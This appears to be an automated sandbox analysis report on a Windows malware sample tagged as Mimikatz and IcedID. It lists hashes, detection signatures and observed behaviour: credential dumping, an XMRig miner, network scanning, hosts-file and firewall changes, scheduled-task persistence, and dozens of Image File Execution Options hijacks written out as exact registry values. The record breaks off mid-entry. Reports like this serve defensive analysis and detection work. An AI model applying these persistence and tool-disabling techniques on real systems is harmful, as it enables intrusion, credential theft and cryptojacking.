Analysis
-
max time kernel
153s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
10-04-2024 18:46
Behavioral task
behavioral1
Sample
2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe
-
Size
7.0MB
-
MD5
a9114bc30a0279a8562dd775a2a34f35
-
SHA1
4982ef4de4498de9680c0e4dfbd6538fb5afdd04
-
SHA256
19078f872d5005e9dd49212541f8e2270630dbe99b0d32152e5e8ed8c2a042c2
-
SHA512
80272706690d45886cbda7447b12f440a1ad9cad5d13f1b109eff142d704f7404600f04184cccc59f7dcd8c4a0f7640a1c27bdb82f3afa93f044ab98a9cf5e1c
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
puelpci.exedescription pid process target process PID 4432 created 1784 4432 puelpci.exe spoolsv.exe -
Contacts a large (19021) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3964-136-0x00007FF699F50000-0x00007FF69A03E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 38 IoCs
Processes:
resource yara_rule behavioral2/memory/2148-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX C:\Windows\ibimzzri\puelpci.exe UPX behavioral2/memory/768-7-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX C:\Windows\btlbpeceu\Corporate\vfshost.exe UPX behavioral2/memory/3964-134-0x00007FF699F50000-0x00007FF69A03E000-memory.dmp UPX behavioral2/memory/3964-136-0x00007FF699F50000-0x00007FF69A03E000-memory.dmp UPX C:\Windows\Temp\btlbpeceu\tvfbneign.exe UPX behavioral2/memory/5004-140-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/5004-143-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX C:\Windows\Temp\irlfzpltl\dlbkbn.exe UPX behavioral2/memory/1820-147-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp UPX behavioral2/memory/2884-157-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/4256-175-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/1820-177-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp UPX behavioral2/memory/2376-180-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/1960-184-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/1820-186-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp UPX behavioral2/memory/1420-190-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/4984-194-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/1820-201-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp UPX behavioral2/memory/1112-203-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/224-207-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/1820-209-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp UPX behavioral2/memory/4376-212-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/3132-216-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/1820-218-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp UPX behavioral2/memory/2200-221-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/4564-225-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/1820-227-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp UPX behavioral2/memory/4816-230-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/4660-233-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/3128-235-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/1820-236-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp UPX behavioral2/memory/4252-238-0x00007FF632060000-0x00007FF6320BB000-memory.dmp UPX behavioral2/memory/1820-249-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp UPX behavioral2/memory/1820-251-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp UPX behavioral2/memory/1820-253-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp UPX behavioral2/memory/1820-254-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp UPX -
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/1820-177-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp xmrig behavioral2/memory/1820-186-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp xmrig behavioral2/memory/1820-201-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp xmrig behavioral2/memory/1820-209-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp xmrig behavioral2/memory/1820-218-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp xmrig behavioral2/memory/1820-227-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp xmrig behavioral2/memory/1820-236-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp xmrig behavioral2/memory/1820-249-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp xmrig behavioral2/memory/1820-251-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp xmrig behavioral2/memory/1820-253-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp xmrig behavioral2/memory/1820-254-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
resource yara_rule behavioral2/memory/2148-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz C:\Windows\ibimzzri\puelpci.exe mimikatz behavioral2/memory/768-7-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3964-136-0x00007FF699F50000-0x00007FF69A03E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
wpcap.exepuelpci.exedescription ioc process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts puelpci.exe File opened for modification C:\Windows\system32\drivers\etc\hosts puelpci.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 4356 netsh.exe 1732 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
puelpci.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe puelpci.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe puelpci.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe puelpci.exe -
Executes dropped EXE 28 IoCs
Processes:
puelpci.exepuelpci.exewpcap.exenfzqetiti.exevfshost.exetvfbneign.exedlbkbn.exetvfbneign.exexohudmc.exepujbqc.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exepuelpci.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exeblitiliem.exepuelpci.exepid process 768 puelpci.exe 4432 puelpci.exe 3344 wpcap.exe 2948 nfzqetiti.exe 3964 vfshost.exe 5004 tvfbneign.exe 1820 dlbkbn.exe 2884 tvfbneign.exe 2088 xohudmc.exe 1748 pujbqc.exe 4256 tvfbneign.exe 2376 tvfbneign.exe 1960 tvfbneign.exe 1420 tvfbneign.exe 4984 tvfbneign.exe 4460 puelpci.exe 1112 tvfbneign.exe 224 tvfbneign.exe 4376 tvfbneign.exe 3132 tvfbneign.exe 2200 tvfbneign.exe 4564 tvfbneign.exe 4816 tvfbneign.exe 4660 tvfbneign.exe 3128 tvfbneign.exe 4252 tvfbneign.exe 2328 blitiliem.exe 464 puelpci.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exenfzqetiti.exepid process 3344 wpcap.exe 3344 wpcap.exe 3344 wpcap.exe 3344 wpcap.exe 3344 wpcap.exe 3344 wpcap.exe 3344 wpcap.exe 3344 wpcap.exe 3344 wpcap.exe 2948 nfzqetiti.exe 2948 nfzqetiti.exe 2948 nfzqetiti.exe -
Processes:
resource yara_rule C:\Windows\btlbpeceu\Corporate\vfshost.exe upx behavioral2/memory/3964-134-0x00007FF699F50000-0x00007FF69A03E000-memory.dmp upx behavioral2/memory/3964-136-0x00007FF699F50000-0x00007FF69A03E000-memory.dmp upx C:\Windows\Temp\btlbpeceu\tvfbneign.exe upx behavioral2/memory/5004-140-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/5004-143-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx C:\Windows\Temp\irlfzpltl\dlbkbn.exe upx behavioral2/memory/1820-147-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp upx behavioral2/memory/2884-157-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/4256-175-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/1820-177-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp upx behavioral2/memory/2376-180-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/1960-184-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/1820-186-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp upx behavioral2/memory/1420-190-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/4984-194-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/1820-201-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp upx behavioral2/memory/1112-203-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/224-207-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/1820-209-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp upx behavioral2/memory/4376-212-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/3132-216-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/1820-218-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp upx behavioral2/memory/2200-221-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/4564-225-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/1820-227-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp upx behavioral2/memory/4816-230-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/4660-233-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/3128-235-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/1820-236-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp upx behavioral2/memory/4252-238-0x00007FF632060000-0x00007FF6320BB000-memory.dmp upx behavioral2/memory/1820-249-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp upx behavioral2/memory/1820-251-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp upx behavioral2/memory/1820-253-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp upx behavioral2/memory/1820-254-0x00007FF7A3E30000-0x00007FF7A3F50000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 74 ifconfig.me 75 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
puelpci.exewpcap.exexohudmc.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A puelpci.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\pujbqc.exe xohudmc.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A puelpci.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\pujbqc.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache puelpci.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 puelpci.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
puelpci.execmd.exeblitiliem.exe2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exedescription ioc process File created C:\Windows\btlbpeceu\UnattendGC\AppCapture64.dll puelpci.exe File created C:\Windows\ibimzzri\spoolsrv.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\crli-0.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\libeay32.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\posh-0.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\vimpcsvc.xml puelpci.exe File created C:\Windows\btlbpeceu\hnkiaiely\Packet.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\spoolsrv.exe puelpci.exe File opened for modification C:\Windows\btlbpeceu\Corporate\log.txt cmd.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\trch-1.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\vimpcsvc.exe puelpci.exe File created C:\Windows\ime\puelpci.exe puelpci.exe File created C:\Windows\btlbpeceu\hnkiaiely\scan.bat puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\trfo-2.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\schoedcl.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\docmicfg.xml puelpci.exe File created C:\Windows\btlbpeceu\Corporate\vfshost.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\cnli-1.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\spoolsrv.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\docmicfg.xml puelpci.exe File created C:\Windows\btlbpeceu\hnkiaiely\wpcap.dll puelpci.exe File opened for modification C:\Windows\ibimzzri\schoedcl.xml puelpci.exe File created C:\Windows\btlbpeceu\upbdrjv\swrpwe.exe puelpci.exe File created C:\Windows\btlbpeceu\hnkiaiely\ip.txt puelpci.exe File opened for modification C:\Windows\btlbpeceu\hnkiaiely\Packet.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\docmicfg.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\svschost.xml puelpci.exe File created C:\Windows\ibimzzri\svschost.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\tucl-1.dll puelpci.exe File opened for modification C:\Windows\ibimzzri\docmicfg.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\svschost.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\vimpcsvc.xml puelpci.exe File opened for modification C:\Windows\ibimzzri\vimpcsvc.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\tibe-2.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\schoedcl.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\spoolsrv.xml puelpci.exe File created C:\Windows\ibimzzri\schoedcl.xml puelpci.exe File created C:\Windows\btlbpeceu\hnkiaiely\wpcap.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\zlib1.dll puelpci.exe File created C:\Windows\ibimzzri\vimpcsvc.xml puelpci.exe File created C:\Windows\ibimzzri\docmicfg.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\coli-0.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\ucl.dll puelpci.exe File opened for modification C:\Windows\btlbpeceu\hnkiaiely\Result.txt blitiliem.exe File created C:\Windows\btlbpeceu\UnattendGC\AppCapture32.dll puelpci.exe File created C:\Windows\btlbpeceu\Corporate\mimilib.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\libxml2.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\svschost.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\schoedcl.xml puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\Shellcode.ini puelpci.exe File opened for modification C:\Windows\ibimzzri\svschost.xml puelpci.exe File created C:\Windows\btlbpeceu\Corporate\mimidrv.sys puelpci.exe File created C:\Windows\ibimzzri\puelpci.exe 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\ibimzzri\puelpci.exe 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe File created C:\Windows\btlbpeceu\hnkiaiely\nfzqetiti.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\exma-1.dll puelpci.exe File created C:\Windows\btlbpeceu\hnkiaiely\blitiliem.exe puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\ssleay32.dll puelpci.exe File created C:\Windows\btlbpeceu\UnattendGC\specials\xdvl-0.dll puelpci.exe File opened for modification C:\Windows\ibimzzri\spoolsrv.xml puelpci.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 3788 sc.exe 3400 sc.exe 4536 sc.exe 3156 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
resource yara_rule C:\Windows\ibimzzri\puelpci.exe nsis_installer_2 C:\Windows\btlbpeceu\hnkiaiely\wpcap.exe nsis_installer_1 C:\Windows\btlbpeceu\hnkiaiely\wpcap.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 2324 schtasks.exe 4872 schtasks.exe 1912 schtasks.exe -
Modifies data under HKEY_USERS 43 IoCs
Processes:
tvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exepuelpci.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exetvfbneign.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ puelpci.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" puelpci.exe Key created \REGISTRY\USER\.DEFAULT\Software tvfbneign.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tvfbneign.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted 